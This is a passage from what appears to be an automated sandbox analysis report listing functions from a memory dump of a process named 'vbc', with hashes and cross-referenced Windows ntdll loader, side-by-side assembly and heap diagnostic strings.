                                                                                                                                                  • Opcode Fuzzy Hash: 1795df682ffaff76084f94d2c0ec84a4dda06864567c0fd9fd3ea4442a975e05
                                                                                                                                                  • Instruction Fuzzy Hash: 6F328071A442A98BDF22CB15C898FAEBBB6BF45748F1448E5E849A7250D7319F81CF40
                                                                                                                                                  Function 05C72F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 05CB292E
                                                                                                                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 05CB2881
                                                                                                                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 05CB2856
                                                                                                                                                  • @, xrefs: 05C73180
                                                                                                                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 05CB29AC
                                                                                                                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 05CB29B1
                                                                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 05CB28B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                                                  • API String ID: 0-541586583
                                                                                                                                                  • Opcode ID: ac17f7db78bb81612896931e562c01987b1ccb393871edb4c0649bd4e1788dc4
                                                                                                                                                  • Instruction ID: d895eab1743b035f8d9eab40a124d4e71f399f3d2b47b84b0128304d2f3aa879
                                                                                                                                                  • Opcode Fuzzy Hash: ac17f7db78bb81612896931e562c01987b1ccb393871edb4c0649bd4e1788dc4
                                                                                                                                                  • Instruction Fuzzy Hash: A7C1A275E002289BEB219F55CC89BBAB7B5FF44B10F0048E9E84DA7250E7759E80DF91
                                                                                                                                                  Function 05CC4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 05CC4E06
                                                                                                                                                  • LdrpProtectedCopyMemory, xrefs: 05CC4DF4
                                                                                                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05CC4E38
                                                                                                                                                  • LdrpGenericExceptionFilter, xrefs: 05CC4DFC
                                                                                                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05CC4DF5
                                                                                                                                                  • ***Exception thrown within loader***, xrefs: 05CC4E27
                                                                                                                                                  • Execute '.cxr %p' to dump context, xrefs: 05CC4EB1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                                                  • API String ID: 0-2973941816
                                                                                                                                                  • Opcode ID: 1aeb4238c571c7faf650297d5d46c621c7fed9149b79291c8acca0f4b86cbe8c
                                                                                                                                                  • Instruction ID: c8521eb13290e8597198f30fb10a4d3f99b7ddcf984f771b13146c5a0227446e
                                                                                                                                                  • Opcode Fuzzy Hash: 1aeb4238c571c7faf650297d5d46c621c7fed9149b79291c8acca0f4b86cbe8c
                                                                                                                                                  • Instruction Fuzzy Hash: A0217972244150BBDF2C9A6C8CDAD36BF99FB43D51F154CADF01296580C960DE00D260
                                                                                                                                                  Function 05C763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                  • Opcode ID: 0f8ca5f4284abd7d237489b5f8a832d4f5aa822cd12a9fea83a1cc37af5f3edb
                                                                                                                                                  • Instruction ID: 6914903b9cadb9af6134943c67883380baf4fee266308ab744aedc7d485a3083
                                                                                                                                                  • Opcode Fuzzy Hash: 0f8ca5f4284abd7d237489b5f8a832d4f5aa822cd12a9fea83a1cc37af5f3edb
                                                                                                                                                  • Instruction Fuzzy Hash: 61915170B0C7159BEF28DF58E889BA97FA2FF01B14F040C69E40267781DBB49941E791
                                                                                                                                                  Function 05C72CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 05C72E4D
                                                                                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 05CB2706
                                                                                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 05CB279C
                                                                                                                                                  • .Local\, xrefs: 05C72D91
                                                                                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 05CB276F
                                                                                                                                                  • \WinSxS\, xrefs: 05C72E23
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                                                  • API String ID: 0-3926108909
                                                                                                                                                  • Opcode ID: 722d3fffb66f9bed4d5028f0acbbc9f309e814cc53298e5ae429d56f98dc5ce1
                                                                                                                                                  • Instruction ID: cd71e0336fb9db52690c6e16012d28c96303333932644317894f7ed1226261fc
                                                                                                                                                  • Opcode Fuzzy Hash: 722d3fffb66f9bed4d5028f0acbbc9f309e814cc53298e5ae429d56f98dc5ce1
                                                                                                                                                  • Instruction Fuzzy Hash: 2681CA792083419BDB11CF19C884AABB7E9FF95700F448C5DF885DB241D7B4DA40CBA2
                                                                                                                                                  Function 05C3645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitShimEngine, xrefs: 05C999F4, 05C99A07, 05C99A30
                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05C99A01
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C99A11, 05C99A3A
                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05C99A2A
                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 05C999ED
                                                                                                                                                  • apphelp.dll, xrefs: 05C36496
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                  • Opcode ID: 2e2ac5e66d8854b4aba810926afefb1255032bd29665390ab8572dc1477f59de
                                                                                                                                                  • Instruction ID: 0d5e78beb4ef9c8d5d5a3c17e7c06f8a2d286cba1d0b62d3c4fc611363939e40
                                                                                                                                                  • Opcode Fuzzy Hash: 2e2ac5e66d8854b4aba810926afefb1255032bd29665390ab8572dc1477f59de
                                                                                                                                                  • Instruction Fuzzy Hash: BD51B571318304AFD725DF28D84AB6B7BE9FB84644F000D2EF58697250DA30EA44DB97
                                                                                                                                                  Function 05C7C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 05CB8181, 05CB81F5
                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 05CB81E5
                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 05CB8170
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C7C6C3
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C7C6C4
                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 05CB8177, 05CB81EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                  • Opcode ID: b09d41a1cb57441e4d00040ed6d745195fcf42495be46e0d320575aa0da504dd
                                                                                                                                                  • Instruction ID: f3fe1a4968d8aabf848bc54d9708327c515f8b048e6c0931444b957cf44925ca
                                                                                                                                                  • Opcode Fuzzy Hash: b09d41a1cb57441e4d00040ed6d745195fcf42495be46e0d320575aa0da504dd
                                                                                                                                                  • Instruction Fuzzy Hash: D7311771748345ABD310EF28DD8BE6A7BD9EF84B14F040D68F845AB391DA60DD04D7A2
                                                                                                                                                  Function 05C72674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 05CB21BF
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05CB2180
                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 05CB2160, 05CB219A, 05CB21BA
                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05CB2178
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CB2165
                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 05CB219F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                  • Opcode ID: 47e39eca03b7f8bf6d197e82c67cce9bfe6324e5f61fa59912f4e9f23a68b4cd
                                                                                                                                                  • Instruction ID: 6078417645e99464e72eb877cfed23e0d84c865aab611d8ce065768930f13541
                                                                                                                                                  • Opcode Fuzzy Hash: 47e39eca03b7f8bf6d197e82c67cce9bfe6324e5f61fa59912f4e9f23a68b4cd
                                                                                                                                                  • Instruction Fuzzy Hash: 8F31093AB40224B7F721CA95CC85F9E7BB9EB54A50F054CA9FA057B240D6B09F01D6A0
                                                                                                                                                  Function 05CC4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                  • API String ID: 0-2518169356
                                                                                                                                                  • Opcode ID: 3e36870da52dfe089a7210cacd46f19c5db3fe4281e5512541e89f1985a42ea6
                                                                                                                                                  • Instruction ID: 67ef492fcd5ff1883c825f1e1d95f4464c979e7e36ee959ee87b89054c852dcd
                                                                                                                                                  • Opcode Fuzzy Hash: 3e36870da52dfe089a7210cacd46f19c5db3fe4281e5512541e89f1985a42ea6
                                                                                                                                                  • Instruction Fuzzy Hash: D191C176E00619CBCB25CF58C885ABEBBB1FF48310F5949A9E811E7350E775EA41CB90
                                                                                                                                                  Function 05C4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                  • Opcode ID: dbbbd76f80226d575731db19a5b3c94e7ddf64a67f5d84edbf82e4ea0c40b800
                                                                                                                                                  • Instruction ID: f65c651b3e912f1592fec0603f323d4d6cb99f4f8e61625434fc9b7a7cbed1c9
                                                                                                                                                  • Opcode Fuzzy Hash: dbbbd76f80226d575731db19a5b3c94e7ddf64a67f5d84edbf82e4ea0c40b800
                                                                                                                                                  • Instruction Fuzzy Hash: 8BC18A756483828FD711CF19C944B6AB7E6FF84708F049C6AF8968B250E738CA49CF56
                                                                                                                                                  Function 05C78402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 05C7855E
                                                                                                                                                  • @, xrefs: 05C78591
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C78421
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C78422
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                  • Opcode ID: c94e32bc51b2b695f3c9c41e3556c8086b078cc5f049461a49d8dfe1f72bc546
                                                                                                                                                  • Instruction ID: 6582fc112824bfa49b1835358719a77b8d9917f7dd72a7d1c483027cfb1d2589
                                                                                                                                                  • Opcode Fuzzy Hash: c94e32bc51b2b695f3c9c41e3556c8086b078cc5f049461a49d8dfe1f72bc546
                                                                                                                                                  • Instruction Fuzzy Hash: 8E91AE71608344AFE721EF64CC59EBBBAE8FB84744F440D2EFA8592140E774DA44DB62
                                                                                                                                                  Function 05C50C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • HEAP: , xrefs: 05CA54E0, 05CA55A1
                                                                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 05CA54ED
                                                                                                                                                  • HEAP[%wZ]: , xrefs: 05CA54D1, 05CA5592
                                                                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 05CA55AE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                  • API String ID: 0-1657114761
                                                                                                                                                  • Opcode ID: 4e9f4a403b138e6ad7594048078722217fc7e700163be59f9b64e52aaaabb266
                                                                                                                                                  • Instruction ID: d498eb88124ce50c2efd6a04043c5d13d29aada7f121911c34b2fa13933a3b41
                                                                                                                                                  • Opcode Fuzzy Hash: 4e9f4a403b138e6ad7594048078722217fc7e700163be59f9b64e52aaaabb266
                                                                                                                                                  • Instruction Fuzzy Hash: 05A1E2346042069BD724CFA9C449BBABBF2FF45314F148929D896DB241D734F984CB95
                                                                                                                                                  Function 05C7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 05CB22B6
                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 05CB21D9, 05CB22B1
                                                                                                                                                  • .Local, xrefs: 05C728D8
                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CB21DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                  • Opcode ID: 73e2addf7e2480f9074ca6204f331508ce8df639b05e457154086bb46cd2c1e2
                                                                                                                                                  • Instruction ID: fa50ce8ce01a729a41d697a613f4ff58a1906cb884fb01168165dae2296df7cd
                                                                                                                                                  • Opcode Fuzzy Hash: 73e2addf7e2480f9074ca6204f331508ce8df639b05e457154086bb46cd2c1e2
                                                                                                                                                  • Instruction Fuzzy Hash: 17A1AE39A0422DDBDF24CF64C888BA9B3B5BF58314F1849EAD809A7651D7709F81CF91
                                                                                                                                                  Function 05C464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 05CA106B
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05CA1028
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05CA0FE5
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 05CA10AE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                  • Opcode ID: ec73cfd4fafed81864dba3e0fdfbc87d37190bedea50a306e2b7e49ff2cb163e
                                                                                                                                                  • Instruction ID: 91673b8615eb7c817c8d3618e10976bd0a34657d59e910fd44d31988439e270b
                                                                                                                                                  • Opcode Fuzzy Hash: ec73cfd4fafed81864dba3e0fdfbc87d37190bedea50a306e2b7e49ff2cb163e
                                                                                                                                                  • Instruction Fuzzy Hash: 3971AEB1A043459FCB20EF54C889FA77FA9AB45764F000C68F9498B24AD735D688DFD2
                                                                                                                                                  Function 05C74D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 05CB362F
                                                                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 05CB365C
                                                                                                                                                  • LdrpFindDllActivationContext, xrefs: 05CB3636, 05CB3662
                                                                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 05CB3640, 05CB366C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                  • API String ID: 0-3779518884
                                                                                                                                                  • Opcode ID: 54e746adddd729efae0747a49753ee92aa3e89198d87eb29054afcad2de26c90
                                                                                                                                                  • Instruction ID: 87741cfb00c2af2863f5e43fecf6a008918b8c84b74e8a3c38f91bd1615535ec
                                                                                                                                                  • Opcode Fuzzy Hash: 54e746adddd729efae0747a49753ee92aa3e89198d87eb29054afcad2de26c90
                                                                                                                                                  • Instruction Fuzzy Hash: C8316E72A04259AEDF39DB4CC8C9F75B6A9FB11B10F064C26E88553A50DBAC9F80C395
                                                                                                                                                  Function 05C6245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 05CAA992
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CAA9A2
                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 05CAA998
                                                                                                                                                  • apphelp.dll, xrefs: 05C62462
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                  • Opcode ID: 688b7dffc45aad6dacecb5274043e215b9874a333411c305246081d2f4f3ddb1
                                                                                                                                                  • Instruction ID: f16568c2fba6bdaf1c9f924f8c2bc2a7da8c2dca8359fa455a1b8b143d883f64
                                                                                                                                                  • Opcode Fuzzy Hash: 688b7dffc45aad6dacecb5274043e215b9874a333411c305246081d2f4f3ddb1
                                                                                                                                                  • Instruction Fuzzy Hash: 2131F776614202ABD7209F6DDD86E7D7FB5FB84704F154C6AF8016B340CBB09A81DB81
                                                                                                                                                  Function 05C50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                  • Opcode ID: 0d2dde5e98cd937a6a92782df4db1459f8107da60d167cdbb3eb72432b1841d5
                                                                                                                                                  • Instruction ID: a27eb99124357d8ed1485dc44405550a1ec1fae750f917a09926536acbf4ed80
                                                                                                                                                  • Opcode Fuzzy Hash: 0d2dde5e98cd937a6a92782df4db1459f8107da60d167cdbb3eb72432b1841d5
                                                                                                                                                  • Instruction Fuzzy Hash: 7BF17A71604606DFDB15CFA9C488F7ABBB2FB44314F148969E816EB381D734EA81CB94
                                                                                                                                                  Function 05C3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                  • Opcode ID: db62d33e1e2672cfdf196ad0db62218d078db5cf1028037ef3b876f603f9a33c
                                                                                                                                                  • Instruction ID: 937daf5510816ccdb44f0913009bdb3fc9b96c2c29fc819d4f0f928d18ab27bf
                                                                                                                                                  • Opcode Fuzzy Hash: db62d33e1e2672cfdf196ad0db62218d078db5cf1028037ef3b876f603f9a33c
                                                                                                                                                  • Instruction Fuzzy Hash: 96A15675A016299BDF25DB64CC8CBEAB7B8FB48710F1009EAE909A7250D7359EC4CF50
                                                                                                                                                  Function 05C3CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
